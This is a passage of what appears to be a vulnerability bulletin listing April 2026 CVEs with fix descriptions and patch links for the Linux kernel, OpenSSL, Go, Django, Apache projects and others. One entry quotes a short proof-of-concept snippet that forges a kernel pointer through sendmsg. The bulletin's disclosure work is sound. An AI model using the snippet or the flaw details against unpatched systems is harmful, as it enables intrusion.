en resolved: media: dvb-net: fix OOB access in ULE extension header tables = The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in = handle_one_ule_extension() are declared with 255 elements (valid indices 0-= 254), but the index htype is derived from network-controlled data as (ule_s= ndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-= of-bounds read occurs on the function pointer table, and the OOB value may =
be called as a function pointer. Add a bounds check on htype against the ar= ray size before either table is accessed. Out-of-range values now cause the=
SNDU to be discarded. 2026-04-06 not yet calculated CVE-2026-31405 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-31405 ] https://git.kernel.org/stabl= e/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8 https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30 https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92 https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: xfrm: Fix work re-schedule after cancel in xfrm_nat_keepalive_= net_fini() After cancel_delayed_work_sync() is called from xfrm_nat_keepali= ve_net_fini(), xfrm_state_fini() flushes remaining states via __xfrm_state_= delete(), which calls xfrm_nat_keepalive_state_updated() to re-schedule nat= _keepalive_work. The following is a simple race scenario: cpu0 cpu1 cleanup= _net() [Round 1] ops_undo_list() xfrm_net_exit() xfrm_nat_keepalive_net_fin= i() cancel_delayed_work_sync(nat_keepalive_work); xfrm_state_fini() xfrm_st= ate_flush() xfrm_state_delete(x) __xfrm_state_delete(x) xfrm_nat_keepalive_= state_updated(x) schedule_delayed_work(nat_keepalive_work); rcu_barrier(); = net_complete_free(); net_passive_dec(net); llist_add(&net->defer_free_list,=
&defer_free_list); cleanup_net() [Round 2] rcu_barrier(); net_complete_fre= e() kmem_cache_free(net_cachep, net); nat_keepalive_work() // on freed net =
To prevent this, cancel_delayed_work_sync() is replaced with disable_delaye= d_work_sync(). 2026-04-06 not yet calculated CVE-2026-31406 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-31406 ] https://git.kernel.org/stable/c/32d0= f44c2f14d60fe8e920e69a28c11051543ec1 https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792 https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13 https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: netfilter: conntrack: add missing netlink policy validations H= yunwoo Kim reports out-of-bounds access in sctp and ctnetlink. These attrib= utes are used by the kernel without any validation. Extend the netlink poli= cies accordingly. Quoting the reporter: nlattr_to_sctp() assigns the user-s= upplied CTA_PROTOINFO_SCTP_STATE value directly to ct->proto.sctp.state wit= hout checking that it is within the valid range. [..] and: ... with exp->di=
r =3D 100, the access at ct->master->tuplehash[100] reads 5600 bytes past t=
he start of a 320-byte nf_conn object, causing a slab-out-of-bounds read co= nfirmed by UBSAN. 2026-04-06 not yet calculated CVE-2026-31407 [ https://ww= w.cve.org/CVERecord?id=3DCVE-2026-31407 ] https://git.kernel.org/stable/c/0= fbae1e74493d5a160a70c51aeba035d8266ea7d https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to = missing sock_hold sco_recv_frame() reads conn->sk under sco_conn_lock() but=
immediately releases the lock without holding a reference to the socket. A=
concurrent close() can free the socket between the lock release and the su= bsequent sk->sk_state access, resulting in a use-after-free. Other function=
s in the same file (sco_sock_timeout(), sco_conn_del()) correctly use sco_s= ock_hold() to safely hold a reference under the lock. Fix by using sco_sock= _hold() to take a reference before releasing the lock, and adding sock_put(=
) on all exit paths. 2026-04-06 not yet calculated CVE-2026-31408 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-31408 ] https://git.kernel.org/stable/= c/b0a7da0e3f7442545f071499beb36374714bb9de https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1 https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3 https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361 https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: ksmbd: unset conn->binding on failed binding request When a mu= ltichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fa= ils ksmbd sets conn->binding =3D true but never clears it on the error path=
. This leaves the connection in a binding state where all subsequent ksmbd_= session_lookup_all() calls fall back to the global sessions table. This fix=
it by clearing conn->binding =3D false in the error path. 2026-04-06 not y=
et calculated CVE-2026-31409 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 31409 ] https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21c= b7f4e
https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921 https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772 https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60 https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION Use sb->s_u= uid for a proper volume identifier as the primary choice. For filesystems t= hat do not provide a UUID, fall back to stfs.f_fsid obtained from vfs_statf= s(). 2026-04-06 not yet calculated CVE-2026-31410 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-31410 ] https://git.kernel.org/stable/c/ce00616bc1df67= 5bfdacc968f2bf7c51f4669227 https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1 https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_sen= d() Reproducer available at [1]. The ATM send path (sendmsg -> vcc_sendmsg =

sigd_send) reads the vcc pointer from msg->vcc and uses it directly with=

out any validation. This pointer comes from userspace via sendmsg() and can=
be arbitrarily forged: int fd =3D socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(= fd, ATMSIGD_CTRL); // become ATM signaling daemon struct msghdr msg =3D { .= msg_iov =3D &iov, ... }; *(unsigned long *)(buf + 4) =3D 0xdeadbeef; // fak=
e vcc pointer sendmsg(fd, &msg, 0); // kernel dereferences 0xdeadbeef In no= rmal operation, the kernel sends the vcc pointer to the signaling daemon vi=
a sigd_enq() when processing operations like connect(), bind(), or listen()=
. The daemon is expected to return the same pointer when responding. Howeve=
r, a malicious daemon can send arbitrary pointer values. Fix this by introd= ucing find_get_vcc() which validates the pointer by searching through vcc_h= ash (similar to how sigd_close() iterates over all VCCs), and acquires a re= ference via sock_hold() if found. Since struct atm_vcc embeds struct sock a=
s its first member, they share the same lifetime. Therefore using sock_hold= /sock_put is sufficient to keep the vcc alive while it is being used. Note = that there may be a race with sigd_close() which could mark the vcc with va= rious flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, = sock_hold() guarantees the memory remains valid, so this race only affects = the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1b= a5949c45529c511152e2f4c755b0f3 2026-04-08 not yet calculated CVE-2026-31411=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-31411 ] https://git.kernel.o= rg/stable/c/c96549d07dfdd51aadf0722cfb40711574424840 https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5 https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2 https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067 https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297 https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651 https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: usb: gadget: f_mass_storage: Fix potential integer overflow in=
check_command_size_in_blocks() The `check_command_size_in_blocks()` functi=
on calculates the data size in bytes by left shifting `common->data_size_fr= om_cmnd` by the block size (`common->curlun->blkbits`). However, it does no=
t validate whether this shift operation will cause an integer overflow. Ini= tially, the block size is set up in `fsg_lun_open()` , and the `common->dat= a_size_from_cmnd` is set up in `do_scsi_command()`. During initialization, = there is no integer overflow check for the interaction between two variable=
s. So if a malicious USB host sends a SCSI READ or WRITE command requesting=
a large amount of data (`common->data_size_from_cmnd`), the left shift ope= ration can wrap around. This results in a truncated data size, which can by= pass boundary checks and potentially lead to memory corruption or out-of-bo= unds accesses. Fix this by using the check_shl_overflow() macro to safely p= erform the shift and catch any overflows. 2026-04-10 not yet calculated CVE= -2026-31412 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31412 ] https://g= it.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5 https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3 https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1
=C2=A0 Linux--Linux In the Linux kernel, the following vulnerability has be=
en resolved: bpf: Fix unsound scalar forking in maybe_fork_scalars() for BP= F_OR maybe_fork_scalars() is called for both BPF_AND and BPF_OR when the so= urce operand is a constant. When dst has signed range [-1, 0], it forks the=
verifier state: the pushed path gets dst =3D 0, the current path gets dst = =3D -1. For BPF_AND this is correct: 0 & K =3D=3D 0. For BPF_OR this is wro= ng: 0 | K =3D=3D K, not 0. The pushed path therefore tracks dst as 0 when t=
he runtime value is K, producing an exploitable verifier/runtime divergence=
that allows out-of-bounds map access. Fix this by passing env->insn_idx (i= nstead of env->insn_idx + 1) to push_stack(), so the pushed path re-execute=
s the ALU instruction with dst =3D 0 and naturally computes the correct res= ult for any opcode. 2026-04-12 not yet calculated CVE-2026-31413 [ https://= www.cve.org/CVERecord?id=3DCVE-2026-31413 ] https://git.kernel.org/stable/c= /342aa1ee995ef5bbf876096dc3a5e51218d76fa4 https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7 https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455 https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5
=C2=A0 OpenSSL--OpenSSL Issue summary: Converting an excessively large OCTE=
T STRING value to a hexadecimal string leads to a heap buffer overflow on 3=
2 bit platforms. Impact summary: A heap buffer overflow may lead to a crash=
or possibly an attacker controlled code execution or other undefined behav= ior. If an attacker can supply a crafted X.509 certificate with an excessiv= ely large OCTET STRING value in extensions such as the Subject Key Identifi=
er (SKID) or Authority Key Identifier (AKID) which are being converted to h= ex, the size of the buffer needed for the result is calculated as multiplic= ation of the input length by 3. On 32 bit platforms, this multiplication ma=
y overflow resulting in the allocation of a smaller buffer and a heap buffe=
r overflow. Applications and services that print or log contents of untrust=
ed X.509 certificates are vulnerable to this issue. As the certificates wou=
ld have to have sizes of over 1 Gigabyte, printing or logging such certific= ates is a fairly unlikely operation and only 32 bit platforms are affected,=
this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3=
.3 and 3.0 are not affected by this issue, as the affected code is outside = the OpenSSL FIPS module boundary. 2026-04-07 not yet calculated CVE-2026-31= 789 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31789 ] OpenSSL Advisory =
[ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/a24216018e1ede= 8ff01a4ff5afff7dfbd443e2f9 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/945b935ac66cc7= f1a41f1b849c7c25adb5351f49 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/364f095b80601d= b632b0def6a33316967f863bde ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/7a9087efd769f3= 62ad9c0e30c7baaa6bbfa65ecf ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/a91e537d16d74= 050dbde50bb0dfb1fe9930f0521 ]
=C2=A0 OpenSSL--OpenSSL Issue summary: Applications using RSASVE key encaps= ulation to establish a secret encryption key can send contents of an uninit= ialized memory buffer to a malicious peer. Impact summary: The uninitialize=
d buffer might contain sensitive data from the previous execution of the ap= plication process which leads to sensitive data leakage to an attacker. RSA= _public_encrypt() returns the number of bytes written on success and -1 on = error. The affected code tests only whether the return value is non-zero. A=
s a result, if RSA encryption fails, encapsulation can still return success=
to the caller, set the output lengths, and leave the caller to use the con= tents of the ciphertext buffer as if a valid KEM ciphertext had been produc= ed. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attack= er-supplied invalid RSA public key without first validating that key, then = this may cause stale or uninitialized contents of the caller-provided ciphe= rtext buffer to be disclosed to the attacker in place of the KEM ciphertext=
. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_= quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS mod= ules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. 2026-04= -07 not yet calculated CVE-2026-31790 [ https://www.cve.org/CVERecord?id=3D= CVE-2026-31790 ] OpenSSL Advisory [ https://openssl-library.org/news/secadv= /20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/abd8b2eec7e3f3= fda60ecfb68498b246b52af482 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/001e01db3e996e= 13ffc72386fe79d03a6683b5ac ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/d5f8e71cd0a54e= 961d0c3b174348f8308486f790 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/b922e24e5b23ff= b9cb9e14cadff23d91e9f7e406 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/eed200f58cd86= 45ed77e46b7e9f764e284df379e ]
=C2=A0 Sonatype--Nexus Repository A vulnerability in the task management co= mponent of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows =
an authenticated attacker with task creation permissions to execute arbitra=
ry code, bypassing the nexus.scripts.allowCreation security control. 2026-0= 4-08 not yet calculated CVE-2026-3199 [ https://www.cve.org/CVERecord?id=3D= CVE-2026-3199 ] https://help.sonatype.com/en/sonatype-nexus-repository-3-91= -0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50615414548499
=C2=A0 Erlang--OTP Improper Certificate Validation vulnerability in Erlang = OTP public_key (pubkey_ocsp module) allows OCSP designated-responder author= ization bypass via missing signature verification. The OCSP response valida= tion in public_key:pkix_ocsp_validate/5 does not verify that a CA-designate=
d responder certificate was cryptographically signed by the issuing CA. Ins= tead, it only checks that the responder certificate's issuer name matches t=
he CA's subject name and that the certificate has the OCSPSigning extended = key usage. An attacker who can intercept or control OCSP responses can crea=
te a self-signed certificate with a matching issuer name and the OCSPSignin=
g EKU, and use it to forge OCSP responses that mark revoked certificates as=
valid. This affects SSL/TLS clients using OCSP stapling, which may accept = connections to servers with revoked certificates, potentially transmitting = sensitive data to compromised servers. Applications using the public_key:pk= ix_ocsp_validate/5 API directly are also affected, with impact depending on=
usage context. This vulnerability is associated with program files lib/pub= lic_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_= responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3= .4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and = ssl from 11.2 until 11.5.4 and 11.2.12.7. 2026-04-07 not yet calculated CVE= -2026-32144 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32144 ] https://g= ithub.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm https://cna.erlef.org/cves/CVE-2026-32144.html https://osv.dev/vulnerability/EEF-CVE-2026-32144 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d48=
91
https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0=
c0
=C2=A0 Gleam--Gleam Improper path validation vulnerability in the Gleam com= piler's handling of git dependencies allows arbitrary file system modificat= ion during dependency download. Dependency names from gleam.toml and manife= st.toml are incorporated into filesystem paths without sufficient validatio=
n or confinement to the intended dependency directory, allowing attacker-co= ntrolled paths (via relative traversal such as ../ or absolute paths) to ta= rget filesystem locations outside that directory. When resolving git depend= encies (e.g. via gleam deps download), the computed path is used for filesy= stem operations including directory deletion and creation. This vulnerabili=
ty occurs during the dependency resolution and download phase, which is gen= erally expected to be limited to fetching and preparing dependencies within=
a confined directory. A malicious direct or transitive git dependency can = exploit this issue to delete and overwrite arbitrary directories outside th=
e intended dependency directory, including attacker-chosen absolute paths, = potentially causing data loss. In some environments, this may be further le= veraged to achieve code execution, for example by overwriting git hooks or = shell configuration files. This issue affects Gleam from 1.9.0-rc1 until 1.= 15.3 and 1.16.0-rc1. 2026-04-11 not yet calculated CVE-2026-32146 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2026-32146 ] https://github.com/gleam-lang/= gleam/security/advisories/GHSA-vq5j-55vx-wq8j https://cna.erlef.org/cves/CVE-2026-32146.html https://osv.dev/vulnerability/EEF-CVE-2026-32146 https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c6= 5e6d5bcf https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13e= b0312d78
=C2=A0 Go standard library--crypto/x509 During chain building, the amount o=
f work that is done is not correctly limited when a large number of interme= diate certificates are passed in VerifyOptions.Intermediates, which can lea=
d to a denial of service. This affects both direct users of crypto/x509 and=
users of crypto/tls. 2026-04-08 not yet calculated CVE-2026-32280 [ https:= //www.cve.org/CVERecord?id=3DCVE-2026-32280 ] https://go.dev/cl/758320 https://go.dev/issue/78282 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4947
=C2=A0 Go standard library--crypto/x509 Validating certificate chains which=
use policies is unexpectedly inefficient when certificates in the chain co= ntain a very large number of policy mappings, possibly causing denial of se= rvice. This only affects validation of otherwise trusted certificate chains=
, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system=
certificate pool. 2026-04-08 not yet calculated CVE-2026-32281 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-32281 ] https://go.dev/cl/758061 https://go.dev/issue/78281 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4946
=C2=A0 Go standard library--internal/syscall/unix On Linux, if the target o=
f Root.Chmod is replaced with a symlink while the chmod operation is in pro= gress, Chmod can operate on the target of the symlink, even when the target=
lies outside the root. The Linux fchmodat syscall silently ignores the AT_= SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Ro= ot.Chmod checks its target before acting and returns an error if the target=
is a symlink lying outside the root, so the impact is limited to cases whe=
re the target is replaced with a symlink between the check and operation. 2= 026-04-08 not yet calculated CVE-2026-32282 [ https://www.cve.org/CVERecord= ?id=3DCVE-2026-32282 ] https://go.dev/cl/763761
https://go.dev/issue/78293 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4864
=C2=A0 Go standard library--crypto/tls If one side of the TLS connection se= nds multiple key update messages post-handshake in a single record, the con= nection can deadlock, causing uncontrolled consumption of resources. This c=
an lead to a denial of service. This only affects TLS 1.3. 2026-04-08 not y=
et calculated CVE-2026-32283 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 32283 ] https://go.dev/cl/763767
https://go.dev/issue/78334 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4870
=C2=A0 Go standard library--archive/tar tar.Reader can allocate an unbounde=
d amount of memory when reading a maliciously-crafted archive containing a = large number of sparse regions encoded in the "old GNU sparse map" format. = 2026-04-08 not yet calculated CVE-2026-32288 [ https://www.cve.org/CVERecor= d?id=3DCVE-2026-32288 ] https://go.dev/cl/763766
https://go.dev/issue/78301 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4869
=C2=A0 Go standard library--html/template Context was not properly tracked = across template branches for JS template literals, leading to possibly inco= rrect escaping of content when branches were used. Additionally template ac= tions within JS template literals did not properly track the brace depth, l= eading to incorrect escaping being applied. These issues could cause action=
s within JS template literals to be incorrectly or improperly escaped, lead= ing to XSS vulnerabilities. 2026-04-08 not yet calculated CVE-2026-32289 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-32289 ] https://go.dev/cl/763762 https://go.dev/issue/78331 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4865
=C2=A0 Apache Software Foundation--Apache Cassandra Authenticated DoS over = CQL in Apache Cassandra 4.0, 4.1, 5.0 allows authenticated user to raise qu= ery latencies via repeated password changes. Users are recommended to upgra=
de to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue. 2026-04-07 not=
yet calculated CVE-2026-32588 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-32588 ] https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc =C2=A0 Apache Software Foundation--Apache Tomcat Improper Input Validation = vulnerability in Apache Tomcat due to an incomplete fix of CVE-2025-66614. = This issue affects Apache Tomcat: from 11.0.15 through 11.0.19, from 10.1.5=
0 through 10.1.52, from 9.0.113 through 9.0.115. Users are recommended to u= pgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue. 2026-04= -09 not yet calculated CVE-2026-32990 [ https://www.cve.org/CVERecord?id=3D= CVE-2026-32990 ] https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1= ghoyn7
=C2=A0 Apache Software Foundation--Apache OpenMeetings Improper Handling of=
Insufficient Privileges vulnerability in Apache OpenMeetings. Any register=
ed user can query web service with their credentials and get files/sub-fold= ers of any folder by ID (metadata only NOT contents). Metadata includes id,=
type, name and some other field. Full list of fields get be checked at=C2= =A0FileItemDTO=C2=A0object. This issue affects Apache OpenMeetings: from 3.=
10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which f= ixes the issue. 2026-04-09 not yet calculated CVE-2026-33005 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-33005 ] https://openmeetings.apache.org/ope= nmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/= dto/file/FileItemDTO.html https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7
=C2=A0 djangoproject--Django An issue was discovered in 6.0 before 6.0.4, 5=
.2 before 5.2.13, and 4.2 before 4.2.30. `MultiPartParser` allows remote at= tackers to degrade performance by submitting multipart uploads with `Conten= t-Transfer-Encoding: base64` including excessive whitespace. Earlier, unsup= ported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated a=
nd may also be affected. Django would like to thank Seokchan Yoon for repor= ting this issue. 2026-04-07 not yet calculated CVE-2026-33033 [ https://www= .cve.org/CVERecord?id=3DCVE-2026-33033 ] Django security archive [ https://= docs.djangoproject.com/en/dev/releases/security/ ]
Django releases announcements [ https://groups.google.com/g/django-announce=
]
Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 [ https://www.dj= angoproject.com/weblog/2026/apr/07/security-releases/ ]
=C2=A0 djangoproject--Django An issue was discovered in 6.0 before 6.0.4, 5=
.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or un= derstated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_= SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to l= oad an unbounded request body into memory. Earlier, unsupported Django seri=
es (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be aff= ected. Django would like to thank Superior for reporting this issue. 2026-0= 4-07 not yet calculated CVE-2026-33034 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-33034 ] Django security archive [ https://docs.djangoproject.co= m/en/dev/releases/security/ ]
Django releases announcements [ https://groups.google.com/g/django-announce=
]
Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 [ https://www.dj= angoproject.com/weblog/2026/apr/07/security-releases/ ]
=C2=A0 Six Apart Ltd.--Movable Type Movable Type provided by Six Apart Ltd.=
contains an SQL Injection vulnerability which may allow an attacker to exe= cute an arbitrary SQL statement. 2026-04-08 not yet calculated CVE-2026-330=
88 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33088 ] https://movabletyp= e.org/news/2026/04/mt-907-released.html https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html https://jvn.jp/en/jp/JVN66473735/
=C2=A0 Acronis--Acronis True Image OEM Local privilege escalation due to im= proper handling of environment variables. The following products are affect= ed: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (= macOS) before build 42902. 2026-04-10 not yet calculated CVE-2026-33092 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-33092 ] SEC-9407 [ https://secur= ity-advisory.acronis.com/advisories/SEC-9407 ]
=C2=A0 Apache Software Foundation--Apache ActiveMQ Client Improper validati=
on and restriction of a classpath path name vulnerability in Apache ActiveM=
Q Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web,=
Apache ActiveMQ. In two instances (when creating a Stomp consumer and also=
browsing messages in the Web console) an authenticated user provided "key"=
value could be constructed to traverse the classpath due to path concatena= tion. As a result, the application is exposed to a classpath path resource = loading vulnerability that could potentially be chained together with anoth=
er attack to lead to exploit. This issue affects Apache ActiveMQ Client: be= fore 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3=
, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 b= efore 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; A= pache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2. Users are recommend=
ed to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19=
.3 and 6.2.2 also fix this issue, but that is limited to non-Windows enviro= nments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3. 20= 26-04-07 not yet calculated CVE-2026-33227 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-33227 ] https://activemq.apache.org/security-advisories.data/= CVE-2026-33227-announcement.txt
=C2=A0 xwiki--xwiki-platform XWiki Platform is a generic wiki platform offe= ring runtime services for applications built on top of it. Prior to 17.4.8 = and 17.10.1, an improperly protected scripting API allows any user with scr= ipt right to bypass the sandboxing of the Velocity scripting API and execut=
e, e.g., arbitrary Python scripts, allowing full access to the XWiki instan=
ce and thereby compromising the confidentiality, integrity and availability=
of the whole instance. Note that script right already constitutes a high l= evel of access that we don't recommend giving to untrusted users. This vuln= erability is fixed in 17.4.8 and 17.10.1. 2026-04-08 not yet calculated CVE= -2026-33229 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33229 ] https://g= ithub.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9 https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a= 4acd15a46e63
https://jira.xwiki.org/browse/XWIKI-23698 https://jira.xwiki.org/browse/XWIKI-23702
=C2=A0 Apache Software Foundation--Apache OpenMeetings Use of Hard-coded Cr= yptographic Key vulnerability in Apache OpenMeetings. The remember-me cooki=
e encryption key is set to default value in openmeetings.properties and not=
being auto-rotated. In case OM admin hasn't changed the default encryption=
key, an attacker who has stolen a cookie from a logged-in user can get ful=
l user credentials. This issue affects Apache OpenMeetings: from 6.1.0 befo=
re 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes th=
e issue. 2026-04-09 not yet calculated CVE-2026-33266 [ https://www.cve.org= /CVERecord?id=3DCVE-2026-33266 ] https://lists.apache.org/thread/b05jnp9563= v49zq494lox9kjbhhf2w66
=C2=A0 ICZ Corporation--MATCHA INVOICE Unrestricted upload of file with dan= gerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulne= rability is exploited, an arbitrary file may be created by an administrator=
of the product. As a result, arbitrary code may be executed on the server.=
2026-04-08 not yet calculated CVE-2026-33273 [ https://www.cve.org/CVEReco= rd?id=3DCVE-2026-33273 ] https://oss.icz.co.jp/news/?p=3D1386 https://jvn.jp/en/jp/JVN33581068/
=C2=A0 OpenIdentityPlatform--OpenAM Open Access Management (OpenAM) is an a= ccess management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is = vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Jav=
a deserialization of the jato.clientSession HTTP parameter. This bypasses t=
he WhitelistObjectInputStream mitigation that was applied to the jato.pageS= ession parameter after CVE-2021-35464. An unauthenticated attacker can achi= eve arbitrary command execution on the server by sending a crafted serializ=
